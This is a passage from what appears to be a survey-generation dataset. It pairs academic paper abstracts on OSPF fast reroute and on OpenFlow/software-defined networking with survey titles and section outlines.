failures (10%). --- paper_title: Relaxed multiple routing configurations: IP fast reroute for single and correlated failures paper_content: Multi-topology routing is an increasingly popular IP network management concept that allows transport of different traffic types over disjoint network paths. The concept is of particular interest for implementation of IP fast reroute (IP FRR). The authors have previously proposed an IP FRR scheme based on multi-topology routing called multiple routing configurations (MRC). MRC supports guaranteed, instantaneous recovery from any single link or node failure in biconnected networks as well as from many combined failures, provided sufficient bandwidth on the surviving links. Furthermore, in MRC different failures result in routing over different network topologies, which gives a good control of the traffic distribution in the networks after a failure. In this paper we present two contributions. First we define an enhanced IP FRR scheme which we call "relaxed MRC" (rMRC). Through experiments we demonstrate that rMRC is an improvement over MRC in all important aspects. Resource utilization in the presence of failures is significantly better, both in terms of paths lengths and in terms of load distribution between the links. The requirement to internal state in the routers is reduced as rMRC requires fewer backup topologies to provide the same degree of protection. In addition to this, the preprocessing needed to generate the backup topologies is simplified. The second contribution is an extension of rMRC that can provide fast reroute in the presence of multiple correlated failures. Our evaluations demonstrate only a small penalty in path lengths and in the number of backup topologies required. --- paper_title: Making IGP Routing Robust to Link Failures paper_content: An important requirement of a robust traffic engineering solution is insensitivity to changes, be they in the form of traffic fluctuations or changes in the network topology because of link failures. In this paper we focus on developing a fast and effective technique to compute traffic engineering solutions for Interior Gateway Protocol (IGPs) environments that are robust to link failures in the logical topology. The routing and packet forwarding decisions for IGPs is primarily governed by link weights. Our focus is on computing a single set of link weights for a traffic engineering instance that performs well over all single logical link failures. Such types of failures, although usually not long lasting, of the order of tens of minutes, can occur with high enough frequency, of the order of several a day, to significantly affect network performance. The relatively short duration of such failures coupled with issues of computational complexity and convergence time due to the size of current day networks discourage adaptive reactions to such events. Consequently, it is desirable to a priori compute a routing solution that performs well in all such scenarios. Through computational evaluations we demonstrate that our technique yields link weights that perform well over all single link failures and also scales well, in terms of computational complexity, with the size of the network. --- paper_title: Evaluation of IP Fast Reroute Proposals paper_content: With the increasing demand for low-latency applications in the Internet, the slow convergence of the existing routing protocols is a growing concern. A number of IP fast reroute mechanisms have been developed by the IETF to address the issue. The goal of the IPFRR mechanisms is to activate alternate routing paths which avoid micro loops under node or link failures. In this paper we present a comprehensive analysis of these proposals by evaluating their coverage for a variety of inferred and synthetic ISP topologies. --- paper_title: Multi-Topology (MT) Routing in OSPF paper_content: This draft describes an extension to OSPF in order to define ::: independent IP topologies called Multi-Topologies (MTs). The MT ::: extension can be used for computing different paths for unicast ::: traffic, multicast traffic, different classes of service based on ::: flexible criteria, or an in-band network management topology. ::: [M-ISIS] describes a similar mechanism for ISIS. An optional ::: extension to exclude selected links from the default topology is also ::: described. --- paper_title: A Survey for Open Shortest Path First Weight Setting (OSPFWS) Problem paper_content: Open shortest path first (OSPF) is the most commonly used intera-domain routing protocol. It used to select the paths along which traffic is routed within autonomous systems (AS), OSPF calculates routes as follow. Each link is assigned weights by operator. Each node in the autonomous system computes shortest paths and creates destination tables used to route data to next node on the path to its destination. Shortest paths are selected according to path cost. Path cost is determined by sum of its weight links. Then link weights determine the shortest paths, in which turn determine the routing of network traffic flow. OSPF weights setting problem is to find a set of OSPF weights that optimizes network performance. OSPF weights setting problem is an NP-hard problem. In the last couple of years, various algorithms for OSPF weights setting problem have been proposed. In this paper, we present a survey of OSPF weights setting algorithms and compare their performances. --- paper_title: A Framework for Loop-free Convergence paper_content: This draft describes mechanisms that may be used to prevent or to ::: suppress the formation of micro-loops when an IP or MPLS network ::: undergoes topology change due to failure, repair or management action. --- paper_title: Internet traffic engineering by optimizing OSPF weights paper_content: Open shortest path first (OSPF) is the most commonly used intra-domain Internet routing protocol. Traffic flow is routed along shortest paths, splitting flow at nodes where several outgoing links are on shortest paths to the destination. The weights of the links, and thereby the shortest path routes, can be changed by the network operator. The weights could be set proportional to their physical distances, but often the main goal is to avoid congestion, i.e., overloading of links, and the standard heuristic recommended by Cisco is to make the weight of a link inversely proportional to its capacity. Our starting point was a proposed AT&T WorldNet backbone with demands projected from previous measurements. The desire was to optimize the weight setting based on the projected demands. We showed that optimizing the weight settings for a given set of demands is NP-hard, so we resorted to a local search heuristic. Surprisingly it turned out that for the proposed AT&T WorldNet backbone, we found weight settings that performed within a few percent from that of the optimal general routing where the flow for each demand is optimally distributed over all paths between source and destination. This contrasts the common belief that OSPF routing leads to congestion and it shows that for the network and demand matrix studied we cannot get a substantially better load balancing by switching to the proposed more flexible multi-protocol label switching (MPLS) technologies. Our techniques were also tested on synthetic internetworks, based on a model of Zegura et al., (1996), for which we did not always get quite as close to the optimal general routing. ---
Title: Improving Convergence Speed and Scalability in OSPF: A Survey Section 1: INTRODUCTION Description 1: This section provides an overview of the OSPF protocol, its history, challenges, and the motivation for improving its convergence speed and scalability. Section 2: CONVERGENCE TO A TOPOLOGY CHANGE IN OSPF: AN OVERVIEW Description 2: This section outlines the general process of OSPF convergence following a topology change, divided into multiple steps. Section 3: FASTER FAILURE DETECTION IN OSPF Description 3: This section describes the default failure detection mechanisms in OSPF, and recent proposals for speeding up failure detection. Section 4: FASTER AND FEWER ADJACENCY ESTABLISHMENTS Description 4: This section covers proposed enhancements to the process of establishing adjacency between routers and reducing the number of required adjacencies, especially in broadcast/NBMA LANs and MANETs. Section 5: LSA GENERATION AND FLOODING Description 5: This section discusses the mechanisms and optimizations related to the generation and flooding of link state advertisements (LSAs) in OSPF. Section 6: ROUTING TABLE CALCULATION Description 6: This section elaborates on the processes involved in routing table calculations in OSPF, including mechanisms to avoid frequent recalculations and dynamic shortest path tree algorithms. Section 7: GRACEFUL RESTART Description 7: This section explains the concept of graceful restart in OSPF, allowing planned control plane reboots without affecting network-wide routing. Section 8: PROACTIVE APPROACHES TO FAILURE RECOVERY Description 8: This section details proactive mechanisms for failure recovery, specifically MPLS fast reroute and IP fast reroute. Section 9: CONCLUSION Description 9: This section summarizes the survey, discusses the challenges and recent improvements in OSPF, and suggests directions for future research.
Network Innovation using OpenFlow: A Survey
10
--- paper_title: OpenFlow: enabling innovation in campus networks paper_content: This whitepaper proposes OpenFlow: a way for researchers to run experimental protocols in the networks they use every day. OpenFlow is based on an Ethernet switch, with an internal flow-table, and a standardized interface to add and remove flow entries. Our goal is to encourage networking vendors to add OpenFlow to their switch products for deployment in college campus backbones and wiring closets. We believe that OpenFlow is a pragmatic compromise: on one hand, it allows researchers to run experiments on heterogeneous switches in a uniform way at line-rate and with high port-density; while on the other hand, vendors do not need to expose the internal workings of their switches. In addition to allowing researchers to evaluate their ideas in real-world traffic settings, OpenFlow could serve as a useful campus component in proposed large-scale testbeds like GENI. Two buildings at Stanford University will soon run OpenFlow networks, using commercial Ethernet switches and routers. We will work to encourage deployment at other schools; and We encourage you to consider deploying OpenFlow in your university network too --- paper_title: A survey of active network research paper_content: Active networks are a novel approach to network architecture in which the switches (or routers) of the network perform customized computations on the messages flowing through them. This approach is motivated by both lead user applications, which perform user-driven computation at nodes within the network today, and the emergence of mobile code technologies that make dynamic network service innovation attainable. The authors discuss two approaches to the realization of active networks and provide a snapshot of the current research issues and activities. They illustrate how the routers of an IP network could be augmented to perform such customized processing on the datagrams flowing through them. These active routers could also interoperate with legacy routers, which transparently forward datagrams in the traditional manner. --- paper_title: OpenFlow: enabling innovation in campus networks paper_content: This whitepaper proposes OpenFlow: a way for researchers to run experimental protocols in the networks they use every day. OpenFlow is based on an Ethernet switch, with an internal flow-table, and a standardized interface to add and remove flow entries. Our goal is to encourage networking vendors to add OpenFlow to their switch products for deployment in college campus backbones and wiring closets. We believe that OpenFlow is a pragmatic compromise: on one hand, it allows researchers to run experiments on heterogeneous switches in a uniform way at line-rate and with high port-density; while on the other hand, vendors do not need to expose the internal workings of their switches. In addition to allowing researchers to evaluate their ideas in real-world traffic settings, OpenFlow could serve as a useful campus component in proposed large-scale testbeds like GENI. Two buildings at Stanford University will soon run OpenFlow networks, using commercial Ethernet switches and routers. We will work to encourage deployment at other schools; and We encourage you to consider deploying OpenFlow in your university network too --- paper_title: NetServ: Active Networking 2.0 paper_content: We present NetServ, a node architecture for deploying in-network services in the next generation Internet. NetServ-enabled network nodes provide a common execution environment, where network services implemented as modules can be dynamically installed and removed. We demonstrate three such modules. MicroCDN is a dynamic content distribution network (CDN) service which implements a content caching strategy specific to a content provider. The NAT Keep-alive module offloads the processing of keep-alive messages from SIP servers. The Media Relay module allows any NetServ node to act as a media relay, eliminating the need to manage standalone relay servers. NetServ aims to revive the Active Networking vision. It was too far ahead of its time a decade ago, but we believe its time has finally arrived. --- paper_title: Towards an active network architecture paper_content: Active networks allow their users to inject customized programs into the nodes of the network. An extreme case, in which we are most interested, replaces packets with "capsules" - program fragments that are executed at each network router/switch they traverse. Active architectures permit a massive increase in the sophistication of the computation that is performed within the network. They enable new applications, especially those based on application-specific multicast, information fusion, and other services that leverage network-based computation and storage. Furthermore, they will accelerate the pace of innovation by decoupling network services from the underlying hardware and allowing new services to be loaded into the infrastructure on demand. In this paper, we describe our vision of an active network architecture, outline our approach to its design, and survey the technologies that can be brought to bear on its implementation. We propose that the research community mount a joint effort to develop and deploy a wide area ActiveNet. --- paper_title: Active networking: one view of the past, present, and future paper_content: All distributed computing systems face the architectural question of the location (and nature) of programmability in the telecommunications networks, computers, and other peripheral devices comprising them. The perspective of this paper is that network elements should be as programmable as possible, to enable the most flexible distributed computing systems. There has been a persistent confluence among operating systems, programming languages, networking and distributed systems. We demonstrate how these interactions led to what is called "active networking," and in the spirit of "vox audita peril, littera scripta manel" (the spoken word perishes, but the written word remains), include an account of how it was made to happen. Lessons are drawn both from the broader research agenda, and the specific goals pursued in the SwitchWare project. We speculate on likely futures for active networking. --- paper_title: The SOFTNET project: a retrospect paper_content: An experimental multihop packet radio network, SOFTNET, is described. The concept of soft protocols for experimental packet-switched networks is introduced. Using this scheme, network nodes can be easily reprogrammed to provide new user services without interrupting normal operation. The SOFTNET network programming language is described. The hardware and software implementation of the network is outlined. > --- paper_title: The ’Platform as a Service’ Model for Networking paper_content: Decoupling infrastructure management from service management can lead to innovation, new business models, and a reduction in the complexity of running services. It is happening in the world of computing, and is poised to happen in networking. While many have considered this in the context of network virtualization, they all focus on one model - overlaying a virtual network of multiple virtual routers on top of a shared physical infrastructure, each completely isolated from the others through the use of virtualization. In this paper we argue for a different approach, where those running the service are presented with the abstraction of a single router in order to enable them to focus solely on their service rather than worrying about managing a virtual network as well. We discuss the abstraction of a single router, and the challenges of mapping the collection of abstract routers (from different parties) to the distributed and shared physical infrastructure. --- paper_title: The IEEE P1520 standards initiative for programmable network interfaces paper_content: This article discusses the need for standard software interfaces for programming of networks, specifically for service and signaling control, through programming interfaces. The objective is to enable the development of open signaling, control, and management applications as well as higher-level multimedia services on networks. The scope of this effort includes ATM switches, circuit switches, IP routers, and hybrid switches such as those that provide for fast switching of IP packets over an ATM backbone. The basic ideas represented herein are in the process of development as a standard for application programming interfaces for networks under IEEE Standards Project IEEE P1520. --- paper_title: OpenFlow: enabling innovation in campus networks paper_content: This whitepaper proposes OpenFlow: a way for researchers to run experimental protocols in the networks they use every day. OpenFlow is based on an Ethernet switch, with an internal flow-table, and a standardized interface to add and remove flow entries. Our goal is to encourage networking vendors to add OpenFlow to their switch products for deployment in college campus backbones and wiring closets. We believe that OpenFlow is a pragmatic compromise: on one hand, it allows researchers to run experiments on heterogeneous switches in a uniform way at line-rate and with high port-density; while on the other hand, vendors do not need to expose the internal workings of their switches. In addition to allowing researchers to evaluate their ideas in real-world traffic settings, OpenFlow could serve as a useful campus component in proposed large-scale testbeds like GENI. Two buildings at Stanford University will soon run OpenFlow networks, using commercial Ethernet switches and routers. We will work to encourage deployment at other schools; and We encourage you to consider deploying OpenFlow in your university network too --- paper_title: Carving research slices out of your production networks with OpenFlow paper_content: 1. SLICED PROGRAMMABLE NETWORKS OpenFlow [4] has been demonstrated as a way for researchers to run networking experiments in their production network. Last year, we demonstrated how an OpenFlow controller running on NOX [3] could move VMs seamlessly around an OpenFlow network [1]. While OpenFlow has potential [2] to open control of the network, only one researcher can innovate on the network at a time. What is required is a way to divide, or slice, network resources so that researchers and network administrators can use them in parallel. Network slicing implies that actions in one slice do not negatively affect other slices, even if they share the same underlying physical hardware. A common network slicing technique is VLANs. With VLANs, the administrator partitions the network by switch port and all traffic is mapped to a VLAN by input port or explicit tag. This coarse-grained type of network slicing complicates more interesting experiments such as IP mobility or wireless handover. Here, we demonstrate FlowVisor, a special purpose OpenFlow controller that allows multiple researchers to run experiments safely and independently on the same production OpenFlow network. To motivate FlowVisor’s flexibility, we demonstrate four network slices running in parallel: one slice for the production network and three slices running experimental code (Figure 1). Our demonstration runs on real network hardware deployed on our production network at Stanford and a wide-area test-bed with a mix of wired and wireless technologies. --- paper_title: Where is the debugger for my software-defined network? paper_content: The behavior of a Software-Defined Network is controlled by programs, which like all software, will have bugs - but this programmatic control also enables new ways to debug networks. This paper introduces ndb, a prototype network debugger inspired by gdb, which implements two primitives useful for debugging an SDN: breakpoints and packet backtraces. We show how ndb modifies forwarding state and logs packet digests to rebuild the sequence of events leading to an errant packet, providing SDN programmers and operators with a valuable tool for tracking down the root cause of a bug. --- paper_title: Frenetic: a network programming language paper_content: Modern networks provide a variety of interrelated services including routing, traffic monitoring, load balancing, and access control. Unfortunately, the languages used to program today's networks lack modern features - they are usually defined at the low level of abstraction supplied by the underlying hardware and they fail to provide even rudimentary support for modular programming. As a result, network programs tend to be complicated, error-prone, and difficult to maintain. This paper presents Frenetic, a high-level language for programming distributed collections of network switches. Frenetic provides a declarative query language for classifying and aggregating network traffic as well as a functional reactive combinator library for describing high-level packet-forwarding policies. Unlike prior work in this domain, these constructs are - by design - fully compositional, which facilitates modular reasoning and enables code reuse. This important property is enabled by Frenetic's novel run-time system which manages all of the details related to installing, uninstalling, and querying low-level packet-processing rules on physical switches. Overall, this paper makes three main contributions: (1) We analyze the state-of-the art in languages for programming networks and identify the key limitations; (2) We present a language design that addresses these limitations, using a series of examples to motivate and validate our choices; (3) We describe an implementation of the language and evaluate its performance on several benchmarks. --- paper_title: OpenFlow: enabling innovation in campus networks paper_content: This whitepaper proposes OpenFlow: a way for researchers to run experimental protocols in the networks they use every day. OpenFlow is based on an Ethernet switch, with an internal flow-table, and a standardized interface to add and remove flow entries. Our goal is to encourage networking vendors to add OpenFlow to their switch products for deployment in college campus backbones and wiring closets. We believe that OpenFlow is a pragmatic compromise: on one hand, it allows researchers to run experiments on heterogeneous switches in a uniform way at line-rate and with high port-density; while on the other hand, vendors do not need to expose the internal workings of their switches. In addition to allowing researchers to evaluate their ideas in real-world traffic settings, OpenFlow could serve as a useful campus component in proposed large-scale testbeds like GENI. Two buildings at Stanford University will soon run OpenFlow networks, using commercial Ethernet switches and routers. We will work to encourage deployment at other schools; and We encourage you to consider deploying OpenFlow in your university network too --- paper_title: Maestro: A System for Scalable OpenFlow Control paper_content: The fundamental feature of an OpenFlow network is that the controller is responsible for the initial establishment of every flow by contacting related switches. Thus the performance of the controller could be a bottleneck. This paper shows how this fundamental problem is addressed by parallelism. The state of the art OpenFlow controller, called NOX, achieves a simple programming model for control function development by having a single-threaded event-loop. Yet NOX has not considered exploiting parallelism. We propose Maestro which keeps the simple programming model for programmers, and exploits parallelism in every corner together with additional throughput optimization techniques. We experimentally show that the throughput of Maestro can achieve near linear scalability on an eight core server machine. Keywords-OpenFlow, network management, multithreading, performance optimization --- paper_title: Extending Networking into the Virtualization Layer paper_content: The move to virtualization has created a new network access layer residing on hosts that connects the various VMs. Virtualized deployment environments impose requirements on networking for which traditional models are not well suited. They also provide advantages to the networking layer (such as software flexibility and welldefined end host events) that are not present in physical networks. To date, this new virtualization network layer has been largely built around standard Ethernet switching, but this technology neither satisfies these new requirements nor leverages the available advantages. We present Open vSwitch, a network switch specifically built for virtual environments. Open vSwitch differs from traditional approaches in that it exports an external interface for fine-grained control of configuration state and forwarding behavior. We describe how Open vSwitch can be used to tackle problems such as isolation in joint-tenant environments, mobility across subnets, and distributing configuration and visibility across hosts. --- paper_title: A network in a laptop: rapid prototyping for software-defined networks paper_content: Mininet is a system for rapidly prototyping large networks on the constrained resources of a single laptop. The lightweight approach of using OS-level virtualization features, including processes and network namespaces, allows it to scale to hundreds of nodes. Experiences with our initial implementation suggest that the ability to run, poke, and debug in real time represents a qualitative change in workflow. We share supporting case studies culled from over 100 users, at 18 institutions, who have developed Software-Defined Networks (SDN). Ultimately, we think the greatest value of Mininet will be supporting collaborative network research, by enabling self-contained SDN prototypes which anyone with a PC can download, run, evaluate, explore, tweak, and build upon. --- paper_title: NOX: towards an operating system for networks paper_content: As anyone who has operated a large network can attest, enterprise networks are difficult to manage. That they have remained so despite significant commercial and academic efforts suggests the need for a different network management paradigm. Here we turn to operating systems as an instructive example in taming management complexity. In the early days of computing, programs were written in machine languages that had no common abstractions for the underlying physical resources. This made programs hard to write, port, reason about, and debug. Modern operating systems facilitate program development by providing controlled access to high-level abstractions for resources (e.g., memory, storage, communication) and information (e.g., files, directories). These abstractions enable programs to carry out complicated tasks safely and efficiently on a wide variety of computing hardware. In contrast, networks are managed through low-level configuration of individual components. Moreover, these configurations often depend on the underlying network; for example, blocking a user’s access with an ACL entry requires knowing the user’s current IP address. More complicated tasks require more extensive network knowledge; forcing guest users’ port 80 traffic to traverse an HTTP proxy requires knowing the current network topology and the location of each guest. In this way, an enterprise network resembles a computer without an operating system, with network-dependent component configuration playing the role of hardware-dependent machine-language programming. What we clearly need is an “operating system” for networks, one that provides a uniform and centralized programmatic interface to the entire network. Analogous to the read and write access to various resources provided by computer operating systems, a network operating system provides the ability to observe and control a network. A network operating system does not manage the network itself; it merely provides a programmatic interface. Applications implemented on top of the network operating system perform the actual management tasks. The programmatic interface should be general enough to support a broad spectrum of network management applications. Such a network operating system represents two major conceptual departures from the status quo. First, the network operating system presents programs with a centralized programming model; programs are written as if the entire network were present on a single machine (i.e., one would use Dijkstra to compute shortest paths, not Bellman-Ford). This requires (as in [3, 8, 14] and elsewhere) centralizing network state. Second, programs are written in terms of high-level abstractions (e.g., user and host names), not low-level configuration parameters (e.g., IP and MAC addresses). This allows management directives to be enforced independent of the underlying network topology, but it requires that the network operating system carefully maintain the bindings (i.e., mappings) between these abstractions and the low-level configurations. Thus, a network operating system allows management applications to be written as centralized programs over highlevel names as opposed to the distributed algorithms over low-level addresses we are forced to use today. While clearly a desirable goal, achieving this transformation from distributed algorithms to centralized programming presents significant technical challenges, and the question we pose here is: Can one build a network operating system at significant scale? --- paper_title: Ethane: taking control of the enterprise paper_content: This paper presents Ethane, a new network architecture for the enterprise. Ethane allows managers to define a single network-wide fine-grain policy, and then enforces it directly. Ethane couples extremely simple flow-based Ethernet switches with a centralized controller that manages the admittance and routing of flows. While radical, this design is backwards-compatible with existing hosts and switches. We have implemented Ethane in both hardware and software, supporting both wired and wireless hosts. Our operational Ethane network has supported over 300 hosts for the past four months in a large university network, and this deployment experience has significantly affected Ethane's design. --- paper_title: OpenFlow and PCE architectures in Wavelength Switched Optical Networks paper_content: The GMPLS protocol suite, originally designed to fully operate in a distributed fashion, is currently the reference control plane for WSONs. Recently, the requirement of effective traffic engineering solutions has lead to the standardization of the PCE architecture, thus joining the distributed GMPLS control plane with a centralized network element devoted to path computation. However, the common need of network carriers to keep the network under a centralized control in strict relationship with the NMS has prevented the wide deployment of GMPLS in currently working optical networks. --- paper_title: A Path Computation Element (PCE)-Based Architecture paper_content: Constraint-based path computation is a fundamental building block for ::: traffic engineering systems such as Multiprotocol Label Switching ::: (MPLS) and Generalized Multiprotocol Label Switching (GMPLS) networks. ::: Path computation in large, multi-domain, multi-region, or multi-layer ::: networks is complex and may require special computational components ::: and cooperation between the different network domains. This document ::: specifies the architecture for a Path Computation Element (PCE)-based ::: model to address this problem space. This document does not attempt to ::: provide a detailed description of all the architectural components, ::: but rather it describes a set of building blocks for the PCE ::: architecture from which solutions may be constructed. This memo ::: provides information for the Internet community. --- paper_title: Source address validation solution with OpenFlow/NOX architecture paper_content: Current Internet is lack of validation on source IP address, resulting in many security threats. The future Internet can face the similar routing locator spoofing problem without careful design. The current in-progress source address validation standard, i.e., SAVI, is not of enough protection due to the solution space constraint. In this article, a mechanism named VAVE is proposed to improve the SAVI solutions. VAVE employs OpenFlow protocol, which provides the de facto standard network innovation interface, to solve source address validation problem with a global view. Significant improvements can be found from our evaluation results. --- paper_title: Lightweight DDoS flooding attack detection using NOX/OpenFlow paper_content: Distributed denial-of-service (DDoS) attacks became one of the main Internet security problems over the last decade, threatening public web servers in particular. Although the DDoS mechanism is widely understood, its detection is a very hard task because of the similarities between normal traffic and useless packets, sent by compromised hosts to their victims. This work presents a lightweight method for DDoS attack detection based on traffic flow features, in which the extraction of such information is made with a very low overhead compared to traditional approaches. This is possible due to the use of the NOX platform which provides a programmatic interface to facilitate the handling of switch information. Other major contributions include the high rate of detection and very low rate of false alarms obtained by flow analysis using Self Organizing Maps. --- paper_title: Software defined networking: Meeting carrier grade requirements paper_content: Software Defined Networking is a networking paradigm which allows network operators to manage networking elements using software running on an external server. This is accomplished by a split in the architecture between the forwarding element and the control element. Two technologies which allow this split for packet networks are For CES and Openflow. We present energy efficiency and resilience aspects of carrier grade networks which can be met by Openflow. We implement flow restoration and run extensive experiments in an emulated carrier grade network. We show that Openflow can restore traffic quite fast, but its dependency on a centralized controller means that it will be hard to achieve 50 ms restoration in large networks serving many flows. In order to achieve 50 ms recovery, protection will be required in carrier grade networks. --- paper_title: Flexible Access Management System for Campus VLAN Based on OpenFlow paper_content: Using a lot of VLANs on campus networks has become popular for deploying many logical networks over minimal fibers/cables. A campus-wide Wi-Fi system, for example, requires a lot of VLANs for separating the access networks from other campus networks and for realizing a sophisticated access control such as guest-/home-users separation and security filtering. The requirement is high especially when a network roaming system, such as eduroam, is introduced. The conventional VLAN based on IEEE802.1Q has some limitations, and the system configuration work is laborious. In this paper, we propose a flexible campus VLAN system based on Open Flow to solve the problems. In addition, we introduce a prototype system and show evaluation results. As the results, we confirm that the proposed system can realize flexible network configurations and sophisticated access control with a much simplified network management work. --- paper_title: Walk the line: consistent network updates with bandwidth guarantees paper_content: New advances in technologies for high-speed and seamless migration of VMs turns VM migration into a promising and efficient means for load balancing, configuration, power saving, attaining a better resource utilization by reallocating VMs, cost management, etc. in data centers. Despite these numerous benefits, VM migration is still a challenging task for providers, since moving VMs requires update of network state, which consequently could lead to inconsistencies, outages, creation of loops and violations of service level (SLA) agreement requirements. Many applications today like financial services, social networking, recommendation systems, and web search cannot tolerate such problems or degradation of service [5, 12]. On the positive side, the emerging trend of Software Defined Networking (SDN) provides a powerful tool for tackling these challenging problems. In SDN, management applications are run by a logically-centralized controller that directly controls the packet handling functionality of the underlying switches. For example, OpenFlow, a recently proposed mechanism for SDN, provides an API that allows the controller to install rules in switches, process data packets, learn the topology changes, and query traffic counters [13]. The ability to run algorithms in a logically centralized location, and precisely manipulate the forwarding layer of switches creates a new opportunity for transitioning the network between two states. In particular this paper studies the question: given a start- --- paper_title: Consistent updates for software-defined networks: change you can believe in! paper_content: Configuration changes are a common source of instability in networks, leading to broken connectivity, forwarding loops, and access control violations. Even when the initial and final states of the network are correct, the update process often steps through intermediate states with incorrect behaviors. These problems have been recognized in the context of specific protocols, leading to a number of point solutions. However, a piecemeal attack on this fundamental problem, while pragmatic in the short term, is unlikely to lead to significant long-term progress. Software-Defined Networking (SDN) provides an exciting opportunity to do better. Because SDN is a clean-slate platform, we can build general, reusable abstractions for network updates that come with strong semantic guarantees. We believe SDN desperately needs such abstractions to make programs simpler to design, more reliable, and easier to validate using automated tools. Moreover, we believe these abstractions should be provided by a runtime system, shielding the programmer from these concerns. We propose two simple, canonical, and effective update abstractions, and present implementation mechanisms. We also show how to integrate them with a network programming language, and discuss potential applications to program verification. --- paper_title: Incremental consistent updates paper_content: A consistent update installs a new packet-forwarding policy across the switches of a software-defined network in place of an old policy. While doing so, such an update guarantees that every packet entering the network either obeys the old policy or the new one, but not some combination of the two. In this paper, we introduce new algorithms that trade the time required to perform a consistent update against the rule-space overhead required to implement it. We break an update in to k rounds that each transfer part of the traffic to the new configuration. The more rounds used, the slower the update, but the smaller the rule-space overhead. To ensure consistency, our algorithm analyzes the dependencies between rules in the old and new policies to determine which rules to add and remove on each round. In addition, we show how to optimize rule space used by representing the minimization problem as a mixed integer linear program. Moreover, to ensure the largest flows are moved first, while using rule space efficiently, we extend the mixed integer linear program with additional constraints. Our initial experiments show that a 6-round, optimized incremental update decreases rule space overhead from 100% to less than 10%. Moreover, if we cap the maximum rule-space overhead at 5% and assume the traffic flow volume follows Zipf's law, we find that 80% of the traffic may be transferred to the new policy in the first round and 99% in the first 3 rounds. --- paper_title: Abstractions for network update paper_content: Configuration changes are a common source of instability in networks, leading to outages, performance disruptions, and security vulnerabilities. Even when the initial and final configurations are correct, the update process itself often steps through intermediate configurations that exhibit incorrect behaviors. This paper introduces the notion of consistent network updates---updates that are guaranteed to preserve well-defined behaviors when transitioning mbetween configurations. We identify two distinct consistency levels, per-packet and per-flow, and we present general mechanisms for implementing them in Software-Defined Networks using switch APIs like OpenFlow. We develop a formal model of OpenFlow networks, and prove that consistent updates preserve a large class of properties. We describe our prototype implementation, including several optimizations that reduce the overhead required to perform consistent updates. We present a verification tool that leverages consistent updates to significantly reduce the complexity of checking the correctness of network control software. Finally, we describe the results of some simple experiments demonstrating the effectiveness of these optimizations on example applications. --- paper_title: Ethane: taking control of the enterprise paper_content: This paper presents Ethane, a new network architecture for the enterprise. Ethane allows managers to define a single network-wide fine-grain policy, and then enforces it directly. Ethane couples extremely simple flow-based Ethernet switches with a centralized controller that manages the admittance and routing of flows. While radical, this design is backwards-compatible with existing hosts and switches. We have implemented Ethane in both hardware and software, supporting both wired and wireless hosts. Our operational Ethane network has supported over 300 hosts for the past four months in a large university network, and this deployment experience has significantly affected Ethane's design. --- paper_title: A safe, efficient update protocol for openflow networks paper_content: We describe a new protocol for update of OpenFlow networks, which has the packet consistency condition of [?] and a weak form of the flow consistency condition of [?]. The protocol conserves switch resources, particularly TCAM space, by ensuring that only a single set of rules is present on a switch at any time. The protocol exploits the identity of switch rules with Boolean functions, and the ability of any switch to send packets to a controller for routing. When a network changes from one ruleset (ruleset 1) to another (ruleset 2), the packets affected by the change are computed, and are sent to the controller. When all switches have been updated to send affected packets to the controller, ruleset 2 is sent to the switches and packets sent to the controller are re-released into the network. --- paper_title: Prototyping Fast, Simple, Secure Switches for Etha paper_content: We recently published our proposal for Ethane: A clean- slate approach to managing and securing enterprise networks. The goal of Ethane is to make enterprise networks (e.g. networks in companies, universities, and home offices) much easier to manage. Ethane is built on the premise that the only way to manage and secure networks is to make sure we can identify the origin of all traffic, and hold someone (or some machine) accountable for it. So first, Ethane authenticates every human, computer and switch in the network, and tracks them at all times. Every packet can be immediately identified with its sender. Second, Ethane implements a network-wide policy language in terms of users, machines and services. Before a flow is allowed into the network, it is checked against the policy. Ethane requires two substantial changes to the network: Network switches and routers are replaced with much simpler switches, which are based on flow tables. The switch doesn't learn addresses, doesn't run spanning tree, routing protocols or any access control lists. All it does is permit or deny flows under the control of a central controller. The controller is the second big change. Each network contains a central controller that decides if a flow is to be allowed into the network. It makes its decisions based on a set of rules that make up a policy. One premise of Ethane is that although the network is much more powerful as a whole, the switches are much simpler than conventional switches and routers. To explore whether this is true, we built 4-port Ethane switches in dedicated hardware (on the NetFPGA platform), running at 1Gb/s per port. We have deployed the switches in our network at Stanford University, and demonstrated that despite the simplicity of the switches, Ethane can support a very feature-rich and easy-to-manage network. --- paper_title: A management method of IP multicast in overlay networks using openflow paper_content: Overlay networks stretch a Layer 2 network and increase mobility of virtual machines. VXLAN (Virtual eXtensible LAN) is one of Layer 2 overlay schemes over a Layer 3 net- work proposed in IETF and its definition covers 16M overlay networks or segments which solves 4K limitation of VLANs. However VXLAN uses IP multicast for the isolation of net- work traffic by tenant in the shared network infrastructure. IP multicast requires great amount of resources such as IP multicast table and CPU therefore the scalability is to be limited by handling of IP multicast. We propose to manage IP multicast in overlay networks using OpenFlow instead of using dynamic registration protocol such as IGMP. We describe our implementations of VXLAN controller, edge switch with VXLAN gateway and OpenFlow switch. Our method using OpenFlow eliminates periodical Join/Leave messages and achieves more than 4k tenants in our Layer 2 network at server edges, which was not possible before. --- paper_title: Outsourcing network functionality paper_content: This paper presents an architecture for adding functionality to networks via outsourcing. In this model, the enterprise network only forwards data; any additional processing is performed by external Feature Providers (FPs). FPs provide and manage features, scaling and moving them in response to customer demand, and providing automated recovery in case of failure. Benefits to the enterprise include reduced cost and management complexity, improved features through FP specialization, and increased choice in services. Central to the model are a policy component and a Feature API (FAPI). Policy is specified with features not locations, enabling features to be located anywhere. FAPI enables communication between enterprise and FP control planes to share policy and configure features. We have built a prototype implementation of this architecture called Jingling. Our prototype system incorporates a nation-wide backbone network and FPs located in six sites around the United States. --- paper_title: Openflow random host mutation: transparent moving target defense using software defined networking paper_content: Static configurations serve great advantage for adversaries in discovering network targets and launching attacks. Identifying active IP addresses in a target domain is a precursory step for many attacks. Frequently changing hosts' IP addresses is a novel proactive moving target defense (MTD) that hides network assets from external/internal scanners. In this paper, we use OpenFlow to develop a MTD architecture that transparently mutates host IP addresses with high unpredictability and rate, while maintaining configuration integrity and minimizing operation overhead. The presented technique is called OpenFlow Random Host Mutation (OF-RHM) in which the OpenFlow controller frequently assigns each host a random virtual IP that is translated to/from the real IP of the host. The real IP remains untouched, so IP mutation is completely transparent for end-hosts. Named hosts are reachable via the virtual IP addresses acquired via DNS, but real IP addresses can be only reached by authorized entities. Our implementation and evaluation show that OF-RHM can effectively defend against stealthy scanning, worm propagation, and other scanning-based attack. --- paper_title: Splendid isolation: a slice abstraction for software-defined networks paper_content: The correct operation of many networks depends on keeping certain kinds of traffic isolated from others, but achieving isolation in networks today is far from straightforward. To achieve isolation, 